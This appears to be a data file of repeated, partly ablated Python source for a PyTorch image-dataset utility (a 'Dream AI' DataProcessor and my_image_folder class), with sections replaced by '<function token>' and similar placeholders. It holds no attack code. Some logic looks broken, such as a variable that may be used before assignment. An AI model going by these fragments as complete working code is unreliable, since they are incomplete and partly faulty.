inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n <function token>\n\n def __len__(self):\n return len(self.data)\n <function token>\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if 
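# denorm_img above inverts transforms.Normalize channel-wise:
# x_norm = (x - mean) / std, hence x = std * x_norm + mean, clipped to [0, 1]
# for plotting. A tensor-level round trip confirming the algebra:
import torch

mean = torch.tensor([0.485, 0.456, 0.406]).view(3, 1, 1)
std = torch.tensor([0.229, 0.224, 0.225]).view(3, 1, 1)
img = torch.rand(3, 8, 8)
restored = (((img - mean) / std) * std + mean).clamp(0, 1)
assert torch.allclose(restored, img, atol=1e-6)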
os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in 
test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n 
transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, 
title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n <function token>\n <function token>\n <function token>\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = 
pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n 
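The object-detection branch above pads each variable-length box target with leading zeros up to the longest target in the set. A standalone sketch of that front-padding (the sample coordinates are made up for illustration):

import numpy as np

targets = [[10.0, 20.0, 30.0, 40.0], [5.0, 5.0, 50.0, 60.0, 7.0, 8.0, 90.0, 100.0]]
max_len = max(len(t) for t in targets)
padded = np.zeros((len(targets), max_len))
for i, t in enumerate(targets):
    padded[i, max_len - len(t):] = t  # zeros in front, real coordinates at the back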
train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, 
transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = 
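get_img_stats() is ablated from this excerpt; all the surrounding code needs from it is a per-channel mean/std estimated over a fraction of the training images, which then overwrites the ImageNet defaults in the Normalize transforms. A plausible stand-in, assuming the temp dataset yields (CxHxW tensor, target) pairs that are already resized:

import torch

def get_img_stats(dataset, fraction=0.6):
    # estimate per-channel mean/std from a random subset of the dataset
    n = max(1, int(len(dataset) * fraction))
    idxs = torch.randperm(len(dataset))[:n].tolist()
    mean, sq = torch.zeros(3), torch.zeros(3)
    for i in idxs:
        img = dataset[i][0].view(3, -1)
        mean += img.mean(1)
        sq += (img ** 2).mean(1)
    mean /= n
    std = (sq / n - mean ** 2).sqrt()  # Var = E[x^2] - E[x]^2
    return mean, std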
self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, 